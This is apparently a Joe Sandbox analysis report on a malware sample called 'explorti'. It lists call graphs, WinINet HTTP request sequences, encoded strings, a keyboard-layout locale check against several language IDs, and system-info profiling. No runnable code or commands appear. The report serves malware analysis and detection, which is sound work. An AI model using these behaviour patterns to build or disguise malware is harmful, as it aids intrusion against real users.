__ehhandler$?_Swap@?$_Func_class@X$$V@std@@IAEXAAV12@@Z __fassign 15069->15072 15071 54b5cf 15070->15071 15072->15039 15074 5322a0 std::invalid_argument::invalid_argument RtlAllocateHeap 15073->15074 15075 54bccf 15074->15075 15075->15018 13908 566beb 13915 566bf7 __fassign 13908->13915 13909 568aaf __fassign 2 API calls 13910 566c26 13909->13910 13911 566c35 13910->13911 13912 566c43 13910->13912 13913 566c99 9 API calls 13911->13913 13914 5668bd 3 API calls 13912->13914 13916 566c3f 13913->13916 13917 566c5d 13914->13917 13915->13909 13918 56681d RtlAllocateHeap 13917->13918 13919 566c6a 13918->13919 13921 566c71 ___free_lconv_mon 13919->13921 13922 566c99 13919->13922 13923 566cc4 __cftof 13922->13923 13929 566ca7 __dosmaperr ___std_exception_copy 13922->13929 13924 566d06 CreateFileW 13923->13924 13930 566cea __dosmaperr ___std_exception_copy 13923->13930 13925 566d2a 13924->13925 13926 566d38 13924->13926 13933 566e01 GetFileType 13925->13933 13945 566d77 13926->13945 13929->13921 13930->13921 13931 566d33 __cftof 13931->13930 13932 566d69 FindCloseChangeNotification 13931->13932 13932->13930 13934 566e3c __cftof 13933->13934 13937 566ed2 __ehhandler$?_Swap@?$_Func_class@X$$V@std@@IAEXAAV12@@Z __dosmaperr 13933->13937 13935 566e75 GetFileInformationByHandle 13934->13935 13934->13937 13936 566e8b 13935->13936 13935->13937 13951 5670c9 13936->13951 13937->13931 13941 566ea8 13942 566f71 SystemTimeToTzSpecificLocalTime 13941->13942 13943 566ebb 13942->13943 13944 566f71 SystemTimeToTzSpecificLocalTime 13943->13944 13944->13937 13976 567314 13945->13976 13947 566d85 13948 566d8a __dosmaperr 13947->13948 13949 5670c9 3 API calls 13947->13949 13948->13931 13950 566da3 13949->13950 13950->13931 13952 5670df _wcsrchr 13951->13952 13955 566e97 13952->13955 13965 56b9e4 13952->13965 13954 567123 13954->13955 13956 56b9e4 3 API calls 13954->13956 13961 566f71 13955->13961 13957 567134 13956->13957 13957->13955 13958 56b9e4 3 API calls 13957->13958 13959 567145 13958->13959 13959->13955 13960 56b9e4 3 API calls 13959->13960 13960->13955 13962 566f89 13961->13962 13963 566fa9 SystemTimeToTzSpecificLocalTime 13962->13963 13964 566f8f __ehhandler$?_Swap@?$_Func_class@X$$V@std@@IAEXAAV12@@Z 13962->13964 13963->13964 13964->13941 13966 56b9f2 13965->13966 13969 56b9f8 __dosmaperr ___std_exception_copy 13966->13969 13970 56ba2d 13966->13970 13968 56ba28 13968->13954 13969->13954 13971 56ba57 13970->13971 13974 56ba3d __dosmaperr ___std_exception_copy 13970->13974 13972 56683a __fassign 3 API calls 13971->13972 13971->13974 13973 56ba81 13972->13973 13973->13974 13975 56b9a5 GetPEB GetPEB RtlAllocateHeap 13973->13975 13974->13968 13975->13973 13977 567338 13976->13977 13979 56733e __ehhandler$?_Swap@?$_Func_class@X$$V@std@@IAEXAAV12@@Z ___std_exception_copy 13977->13979 13980 567036 13977->13980 13979->13947 13981 567042 __dosmaperr 13980->13981 13986 56b87b 13981->13986 13983 56705a __dosmaperr 13984 56b87b RtlAllocateHeap 13983->13984 13985 567068 13983->13985 13984->13985 13985->13979 13989 56b6de 13986->13989 13988 56b894 13988->13983 13990 56b6ee 13989->13990 13991 56b75a 13989->13991 13990->13991 13992 56b6f5 13990->13992 14006 571ef8 13991->14006 13997 56b702 ___std_exception_copy 13992->13997 13998 56b675 13992->13998 13995 56b73b 14002 56b815 13995->14002 13997->13988 13999 56b690 13998->13999 14000 56b695 __dosmaperr 13999->14000 14009 56b7b7 13999->14009 14000->13995 14003 56b822 14002->14003 14005 56b83b __fassign 14002->14005 14004 568aa4 ___std_exception_copy RtlAllocateHeap 14003->14004 14003->14005 14004->14005 14005->13997 14016 571d22 14006->14016 14008 571f0f 14008->13997 14010 56b7c5 14009->14010 14013 56b7f6 14010->14013 14014 568aa4 ___std_exception_copy RtlAllocateHeap 14013->14014 14015 56b7d6 14014->14015 14015->14000 14017 571d54 14016->14017 14023 571d40 __ehhandler$?_Swap@?$_Func_class@X$$V@std@@IAEXAAV12@@Z __dosmaperr ___std_exception_copy 14016->14023 14018 56b7b7 RtlAllocateHeap 14017->14018 14017->14023 14019 571de9 14018->14019 14020 56b675 RtlAllocateHeap 14019->14020 14021 571df6 14020->14021 14022 56b815 RtlAllocateHeap 14021->14022 14021->14023 14022->14023 14023->14008 15085 54b7e9 15086 54b6e5 11 API calls 15085->15086 15088 54b811 Concurrency::details::_Reschedule_chore 15086->15088 15087 54b836 15090 54b648 11 API calls 15087->15090 15088->15087 15092 54cade 15088->15092 15091 54b84e 15090->15091 15093 54cafc 15092->15093 15094 54caec TpCallbackUnloadDllOnCompletion 15092->15094 15093->15087 15094->15093

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 760 53bd60-53bdac 761 53bdb2-53bdb6 760->761 762 53c1a1-53c1c6 call 547f30 760->762 761->762 763 53bdbc-53bdc0 761->763 767 53c1f4-53c20c 762->767 768 53c1c8-53c1d4 762->768 763->762 765 53bdc6-53be4f InternetOpenW InternetConnectA call 547870 call 535b20 763->765 794 53be53-53be6f HttpOpenRequestA 765->794 795 53be51 765->795 772 53c212-53c21e 767->772 773 53c158-53c170 767->773 770 53c1d6-53c1e4 768->770 771 53c1ea-53c1f1 call 54d593 768->771 770->771 775 53c26f-53c274 call 566b9a 770->775 771->767 777 53c224-53c232 772->777 778 53c14e-53c155 call 54d593 772->778 779 53c243-53c25f call 54cf21 773->779 780 53c176-53c182 773->780 777->775 785 53c234 777->785 778->773 786 53c239-53c240 call 54d593 780->786 787 53c188-53c196 780->787 785->778 786->779 787->775 793 53c19c 787->793 793->786 798 53be71-53be80 794->798 799 53bea0-53bf0f call 547870 call 535b20 call 547870 call 535b20 794->799 795->794 800 53be82-53be90 798->800 801 53be96-53be9d call 54d593 798->801 812 53bf13-53bf29 HttpSendRequestA 799->812 813 53bf11 799->813 800->801 801->799 814 53bf2b-53bf3a 812->814 815 53bf5a-53bf82 812->815 813->812 816 53bf50-53bf57 call 54d593 814->816 817 53bf3c-53bf4a 814->817 818 53bfb3-53bfd4 InternetReadFile 815->818 819 53bf84-53bf93 815->819 816->815 817->816 823 53bfda 818->823 821 53bf95-53bfa3 819->821 822 53bfa9-53bfb0 call 54d593 819->822 821->822 822->818 826 53bfe0-53c090 call 564180 823->826
                      APIs
                      • InternetOpenW.WININET(00588D68,00000000,00000000,00000000,00000000), ref: 0053BDED
                      • InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 0053BE11
                      • HttpOpenRequestA.WININET(?,00000000), ref: 0053BE5A
                      • HttpSendRequestA.WININET(?,00000000), ref: 0053BF1B
                      • InternetReadFile.WININET(?,?,000003FF,?), ref: 0053BFCC
                      • InternetCloseHandle.WININET(?), ref: 0053C0A7
                      • InternetCloseHandle.WININET(?), ref: 0053C0AF
                      • InternetCloseHandle.WININET(?), ref: 0053C0B7
                      Strings
                      Memory Dump Source
                      • Source File: 00000006.00000002.2931526635.0000000000531000.00000040.00000001.01000000.00000008.sdmp, Offset: 00530000, based on PE: true
                      • Associated: 00000006.00000002.2931495918.0000000000530000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931526635.0000000000592000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931612690.0000000000599000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.000000000059B000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.0000000000720000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.000000000082D000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.0000000000835000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.0000000000843000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2932002911.0000000000844000.00000080.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2932686648.00000000009E1000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2932710524.00000000009E3000.00000080.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_530000_explorti.jbxd
                      Yara matches
                      Similarity
                      • API ID: Internet$CloseHandle$HttpOpenRequest$ConnectFileReadSend
                      • String ID: 6JLUcBRYEz9=$6JLUcxtnEx==$PG3NVu==$PoPn$d4Y$invalid stoi argument$stoi argument out of range
                      • API String ID: 688256393-1527206469
                      • Opcode ID: df20097129e98b477a6f083f30da3cb95786780aaebc5dcdd8f1feae3f05c377
                      • Instruction ID: d624d48d5c515634b6b06778890eca18d160cd38b75c198feae9d89a3b1429a3
                      • Opcode Fuzzy Hash: df20097129e98b477a6f083f30da3cb95786780aaebc5dcdd8f1feae3f05c377
                      • Instruction Fuzzy Hash: ACB1B2B16001189BEB24DF28CC88BDEBF69FF85304F5041A9F509A7292D7719A80CBA5

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 915 53e440-53e989 call 547870 call 535b20 call 547870 call 535b20 call 5491b0 call 548250 call 548150 call 548250 call 547870 * 3 call 53bd60 call 547870 * 2 call 535b20 call 5384b0 960 53e9b3-53e9cd call 54cf21 915->960 961 53e98b-53e997 915->961 962 53e9a9-53e9b0 call 54d593 961->962 963 53e999-53e9a7 961->963 962->960 963->962 966 53e9d3-53ed89 call 566b9a call 547870 call 535b20 call 5482f0 call 548150 call 547870 call 535b20 call 5482f0 call 548150 963->966 1001 53f183-53f19b 966->1001 1002 53f4cb-53f57c call 547f30 966->1002 1003 53f5b3-53f5c6 1001->1003 1004 53f1a1-53f1ad 1001->1004 1002->1001 1007 53f5a9-53f5b0 call 54d593 1002->1007 1006 53f1b3-53f1c1 1004->1006 1004->1007 1006->1002 1009 53f5db-53f872 call 566b9a call 547870 call 535b20 call 547870 * 4 call 53e440 call 547f30 call 547870 call 547f30 * 2 1006->1009 1007->1003 1044 53f874-53f880 1009->1044 1045 53f89c-53f8b5 call 54cf21 1009->1045 1046 53f892-53f899 call 54d593 1044->1046 1047 53f882-53f890 1044->1047 1046->1045 1047->1046 1049 53f8bb-53fa25 call 566b9a call 547870 call 535b20 call 547870 * 4 call 53e440 1047->1049 1073 53fa27-53fa33 1049->1073 1074 53fa4f-53fa5e 1049->1074 1075 53fa45-53fa4c call 54d593 1073->1075 1076 53fa35-53fa43 1073->1076 1075->1074 1076->1075 1077 53fa5f-53fb7f call 566b9a call 547870 call 5394b0 call 539160 call 548250 1076->1077 1092 53fb80-53fb85 1077->1092 1092->1092 1093 53fb87-540770 call 547f30 call 547870 * 2 call 53c280 call 566659 call 547870 call 535b20 call 547870 * 4 call 53e440 1092->1093 1127 540772-54077e 1093->1127 1128 54079a-5407b5 call 54cf21 1093->1128 1129 540790-540797 call 54d593 1127->1129 1130 540780-54078e 1127->1130 1129->1128 1130->1129 1132 5407de-5411f4 call 566b9a call 547870 call 535b20 call 547870 * 4 call 53e440 1130->1132 1153 5411f9-54149c 1132->1153
                      Strings
                      Memory Dump Source
                      • Source File: 00000006.00000002.2931526635.0000000000531000.00000040.00000001.01000000.00000008.sdmp, Offset: 00530000, based on PE: true
                      • Associated: 00000006.00000002.2931495918.0000000000530000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931526635.0000000000592000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931612690.0000000000599000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.000000000059B000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.0000000000720000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.000000000082D000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.0000000000835000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.0000000000843000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2932002911.0000000000844000.00000080.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2932686648.00000000009E1000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2932710524.00000000009E3000.00000080.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_530000_explorti.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: #$0657d1$111$246122658369$EpPoaRV1$KIG+$KS==$SC==$UFy=$UVu=$UVy=$d4Y
                      • API String ID: 0-960601662
                      • Opcode ID: c854cdd5b3f151c3b9fa30f4e5e7fc13761b128ffe25ca9b3b464fb1094ef556
                      • Instruction ID: bdbd362c4ea50e9b43002b77e3b6ba6458a9a8de7d23e1a1fa05e203471a62dd
                      • Opcode Fuzzy Hash: c854cdd5b3f151c3b9fa30f4e5e7fc13761b128ffe25ca9b3b464fb1094ef556
                      • Instruction Fuzzy Hash: 2582B170904248DBEF14EF68C94A7DE7FB6BB46308F508598E805673C2D7759A88CBD2

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1664 54d312-54d315 1665 54d324-54d327 call 568aa4 1664->1665 1667 54d32c-54d32f 1665->1667 1668 54d317-54d322 call 568cf9 1667->1668 1669 54d331-54d332 1667->1669 1668->1665 1672 54d333-54d337 1668->1672 1673 532440-532490 call 532380 call 563a31 call 5637dc 1672->1673 1674 54d33d-54dcde call 54ab41 call 563a31 call 577bc5 1672->1674 1688 54dce4-54dd49 1674->1688 1689 54de8d-54de90 1674->1689 1690 54dd8e 1688->1690 1691 54dd4b-54dd58 1688->1691 1692 54dd94-54dda0 1690->1692 1693 54dd7d-54dd8c 1691->1693 1694 54dd5a-54dd5f 1691->1694 1695 54ddd1 1692->1695 1696 54dda2-54ddc4 1692->1696 1693->1692 1694->1693 1697 54dd61-54dd66 1694->1697 1698 54ddd4-54ddf1 1695->1698 1696->1698 1699 54ddc6-54ddcf 1696->1699 1697->1693 1700 54dd68-54dd6d 1697->1700 1701 54ddf7-54de0f 1698->1701 1702 54de8a-54de8c 1698->1702 1699->1698 1700->1693 1703 54dd6f-54dd74 1700->1703 1701->1702 1704 54de11-54de17 1701->1704 1702->1689 1703->1693 1705 54dd76-54dd7b 1703->1705 1704->1702 1706 54de19-54de31 1704->1706 1705->1690 1705->1693 1706->1702 1707 54de33-54de4d 1706->1707 1707->1702 1708 54de4f-54de6a 1707->1708 1708->1702 1709 54de6c-54de7b 1708->1709 1709->1702 1710 54de7d-54de84 1709->1710 1710->1702
                      APIs
                      • ___std_exception_copy.LIBVCRUNTIME ref: 0053247E
                      Strings
                      Memory Dump Source
                      • Source File: 00000006.00000002.2931526635.0000000000531000.00000040.00000001.01000000.00000008.sdmp, Offset: 00530000, based on PE: true
                      • Associated: 00000006.00000002.2931495918.0000000000530000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931526635.0000000000592000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931612690.0000000000599000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.000000000059B000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.0000000000720000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.000000000082D000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.0000000000835000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.0000000000843000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2932002911.0000000000844000.00000080.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2932686648.00000000009E1000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2932710524.00000000009E3000.00000080.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_530000_explorti.jbxd
                      Yara matches
                      Similarity
                      • API ID: ___std_exception_copy
                      • String ID: 'kTd+Y$'kTd+Y
                      • API String ID: 2659868963-1657846907
                      • Opcode ID: 2b0de52f2cd66dab0193f1964c68d717731f9429958c936856cdc31947605813
                      • Instruction ID: 42f64dd79b8d06954f20eedf8ea2ce2500bb870a8933539d882613c1405d3690
                      • Opcode Fuzzy Hash: 2b0de52f2cd66dab0193f1964c68d717731f9429958c936856cdc31947605813
                      • Instruction Fuzzy Hash: 2651FEB1E006069FDB15CF68D8857AEBBF4FB18314F24852BE805EB250E3349914DFA0
                      Strings
                      Memory Dump Source
                      • Source File: 00000006.00000002.2931526635.0000000000531000.00000040.00000001.01000000.00000008.sdmp, Offset: 00530000, based on PE: true
                      • Associated: 00000006.00000002.2931495918.0000000000530000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931526635.0000000000592000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931612690.0000000000599000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.000000000059B000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.0000000000720000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.000000000082D000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.0000000000835000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.0000000000843000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2932002911.0000000000844000.00000080.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2932686648.00000000009E1000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2932710524.00000000009E3000.00000080.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_530000_explorti.jbxd
                      Yara matches
                      Similarity
                      • API ID: InternetOpen$Cnd_destroy_in_situCnd_unregister_at_thread_exitConnectHttpMtx_destroy_in_situRequest
                      • String ID: 0657d1$246122658369$6YK0$7470$75G0$7JS0$84K0$85K3cq==$8IG0$8lU=$9YY0$9pG0$Dy==$IEYUMK==$KIG+$KIK+$TZC0$TZS0$Toe0$UIU0$stoi argument out of range$-Y
                      • API String ID: 3545240790-2020708354
                      • Opcode ID: 50b3dea6269a2128f273815ae4a4d5a45c24407cd20ed78cd01305019f937b3d
                      • Instruction ID: 927eecfe2450596630423df3cd29f463cd055c5e781dee2fced62e4f46135bd4
                      • Opcode Fuzzy Hash: 50b3dea6269a2128f273815ae4a4d5a45c24407cd20ed78cd01305019f937b3d
                      • Instruction Fuzzy Hash: 8823F371A001589BEF19DB28CD897DDBF76BB86308F5481D8E009A7292EB355F84CF52

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1163 535df0-535eee 1169 535ef0-535efc 1163->1169 1170 535f18-535f25 call 54cf21 1163->1170 1172 535f0e-535f15 call 54d593 1169->1172 1173 535efe-535f0c 1169->1173 1172->1170 1173->1172 1175 535f26-5360ad call 566b9a call 54e080 call 547f30 * 5 RegOpenKeyExA 1173->1175 1192 5360b3-536143 call 564020 1175->1192 1193 536478-536481 1175->1193 1219 536466-536472 1192->1219 1220 536149-53614d 1192->1220 1195 536483-53648e 1193->1195 1196 5364ae-5364b7 1193->1196 1200 536490-53649e 1195->1200 1201 5364a4-5364ab call 54d593 1195->1201 1197 5364e4-5364ed 1196->1197 1198 5364b9-5364c4 1196->1198 1204 53651a-536523 1197->1204 1205 5364ef-5364fa 1197->1205 1202 5364c6-5364d4 1198->1202 1203 5364da-5364e1 call 54d593 1198->1203 1200->1201 1206 53659e-5365a3 call 566b9a 1200->1206 1201->1196 1202->1203 1202->1206 1203->1197 1214 536525-536530 1204->1214 1215 53654c-536555 1204->1215 1211 536510-536517 call 54d593 1205->1211 1212 5364fc-53650a 1205->1212 1211->1204 1212->1206 1212->1211 1223 536542-536549 call 54d593 1214->1223 1224 536532-536540 1214->1224 1216 536582-53659d call 54cf21 1215->1216 1217 536557-536566 1215->1217 1226 536578-53657f call 54d593 1217->1226 1227 536568-536576 1217->1227 1219->1193 1228 536153-536187 RegEnumValueW 1220->1228 1229 536460 1220->1229 1223->1215 1224->1206 1224->1223 1226->1216 1227->1206 1227->1226 1234 53644d-536454 1228->1234 1235 53618d-5361ad 1228->1235 1229->1219 1234->1228 1238 53645a 1234->1238 1240 5361b0-5361b9 1235->1240 1238->1229 1240->1240 1241 5361bb-53624d call 547c50 call 548090 call 547870 * 2 call 535c60 1240->1241 1241->1234
                      Strings
                      Memory Dump Source
                      • Source File: 00000006.00000002.2931526635.0000000000531000.00000040.00000001.01000000.00000008.sdmp, Offset: 00530000, based on PE: true
                      • Associated: 00000006.00000002.2931495918.0000000000530000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931526635.0000000000592000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931612690.0000000000599000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.000000000059B000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.0000000000720000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.000000000082D000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.0000000000835000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.0000000000843000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2932002911.0000000000844000.00000080.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2932686648.00000000009E1000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2932710524.00000000009E3000.00000080.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_530000_explorti.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: 00000419$00000422$00000423$0000043f$Keyboard Layout\Preload
                      • API String ID: 0-3963862150
                      • Opcode ID: ffff3d7d3617ef7527d9b492627c3c0e6fda44d4d8be05ff44734a3bd7685702
                      • Instruction ID: 029ea037153ef8949da2fa9bc5ce042dbdc5c48c9121071311508f39dbeca1e7
                      • Opcode Fuzzy Hash: ffff3d7d3617ef7527d9b492627c3c0e6fda44d4d8be05ff44734a3bd7685702
                      • Instruction Fuzzy Hash: E2E16D71900219BBEF24DBA4CC8DBDEBB79BB44304F5042D9E509A7292DB749BC88F51

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1251 537d00-537d82 call 564020 1255 537d88-537db0 call 547870 call 535b20 1251->1255 1256 53827e-53829b call 54cf21 1251->1256 1263 537db2 1255->1263 1264 537db4-537dd6 call 547870 call 535b20 1255->1264 1263->1264 1269 537dda-537df3 1264->1269 1270 537dd8 1264->1270 1273 537df5-537e04 1269->1273 1274 537e24-537e4f 1269->1274 1270->1269 1275 537e06-537e14 1273->1275 1276 537e1a-537e21 call 54d593 1273->1276 1277 537e51-537e60 1274->1277 1278 537e80-537ea1 1274->1278 1275->1276 1281 53829c call 566b9a 1275->1281 1276->1274 1283 537e62-537e70 1277->1283 1284 537e76-537e7d call 54d593 1277->1284 1279 537ea3-537ea5 GetNativeSystemInfo 1278->1279 1280 537ea7-537eac 1278->1280 1286 537ead-537eb6 1279->1286 1280->1286 1293 5382a1-5382a6 call 566b9a 1281->1293 1283->1281 1283->1284 1284->1278 1291 537ed4-537ed7 1286->1291 1292 537eb8-537ebf 1286->1292 1296 53821f-538222 1291->1296 1297 537edd-537ee6 1291->1297 1294 537ec5-537ecf 1292->1294 1295 538279 1292->1295 1299 538274 1294->1299 1295->1256 1296->1295 1302 538224-53822d 1296->1302 1300 537ef9-537efc 1297->1300 1301 537ee8-537ef4 1297->1301 1299->1295 1304 537f02-537f09 1300->1304 1305 5381fc-5381fe 1300->1305 1301->1299 1306 538254-538257 1302->1306 1307 53822f-538233 1302->1307 1308 537fe9-5381e5 call 547870 call 535b20 call 547870 call 535b20 call 535c60 call 547870 call 535b20 call 535640 call 547870 call 535b20 call 547870 call 535b20 call 535c60 call 547870 call 535b20 call 535640 call 547870 call 535b20 call 547870 call 535b20 call 535c60 call 547870 call 535b20 call 535640 1304->1308 1309 537f0f-537f6b call 547870 call 535b20 call 547870 call 535b20 call 535c60 1304->1309 1314 538200-53820a 1305->1314 1315 53820c-53820f 1305->1315 1312 538265-538271 1306->1312 1313 538259-538263 1306->1313 1310 538235-53823a 1307->1310 1311 538248-538252 1307->1311 1351 5381eb-5381f4 1308->1351 1337 537f70-537f77 1309->1337 1310->1311 1317 53823c-538246 1310->1317 1311->1295 1312->1299 1313->1295 1314->1299 1315->1295 1319 538211-53821d 1315->1319 1317->1295 1319->1299 1339 537f7b-537f9b call 568a81 1337->1339 1340 537f79 1337->1340 1346 537fd2-537fd4 1339->1346 1347 537f9d-537fac 1339->1347 1340->1339 1346->1351 1352 537fda-537fe4 1346->1352 1348 537fc2-537fcf call 54d593 1347->1348 1349 537fae-537fbc 1347->1349 1348->1346 1349->1293 1349->1348 1351->1296 1355 5381f6 1351->1355 1352->1351 1355->1305
                      APIs
                      • GetNativeSystemInfo.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00537EA3
                      Strings
                      Memory Dump Source
                      • Source File: 00000006.00000002.2931526635.0000000000531000.00000040.00000001.01000000.00000008.sdmp, Offset: 00530000, based on PE: true
                      • Associated: 00000006.00000002.2931495918.0000000000530000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931526635.0000000000592000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931612690.0000000000599000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.000000000059B000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.0000000000720000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.000000000082D000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.0000000000835000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.0000000000843000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2932002911.0000000000844000.00000080.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2932686648.00000000009E1000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2932710524.00000000009E3000.00000080.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_530000_explorti.jbxd
                      Yara matches
                      Similarity
                      • API ID: InfoNativeSystem
                      • String ID: HlurNa==$HlurOK==$HlusMa==
                      • API String ID: 1721193555-2203186029
                      • Opcode ID: daff585d1d3754ff62bdd86f7486f9c424bd21d0f58941b1d77ab593e9ff6f92
                      • Instruction ID: 2589d850d573234d91be8f6727347b9b2311c301196cfd109d35d31e988b2c64
                      • Opcode Fuzzy Hash: daff585d1d3754ff62bdd86f7486f9c424bd21d0f58941b1d77ab593e9ff6f92
                      • Instruction Fuzzy Hash: 48D1FA74E00609A7DF14AB68CC5A3AD7F71BB86314F944288F415A73D2DB354E848BD2

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1389 566e01-566e36 GetFileType 1390 566eee-566ef1 1389->1390 1391 566e3c-566e47 1389->1391 1394 566ef3-566ef6 1390->1394 1395 566f1a-566f42 1390->1395 1392 566e69-566e85 call 564020 GetFileInformationByHandle 1391->1392 1393 566e49-566e5a call 567177 1391->1393 1405 566f0b-566f18 call 56740d 1392->1405 1410 566e8b-566ecd call 5670c9 call 566f71 * 3 1392->1410 1407 566f07-566f09 1393->1407 1408 566e60-566e67 1393->1408 1394->1395 1400 566ef8-566efa 1394->1400 1396 566f44-566f57 1395->1396 1397 566f5f-566f61 1395->1397 1396->1397 1413 566f59-566f5c 1396->1413 1402 566f62-566f70 call 54cf21 1397->1402 1404 566efc-566f01 call 567443 1400->1404 1400->1405 1404->1407 1405->1407 1407->1402 1408->1392 1425 566ed2-566eea call 567096 1410->1425 1413->1397 1425->1397 1428 566eec 1425->1428 1428->1407
                      APIs
                      • GetFileType.KERNELBASE(?,?,00000000,00000000), ref: 00566E23
                      • GetFileInformationByHandle.KERNELBASE(?,?), ref: 00566E7D
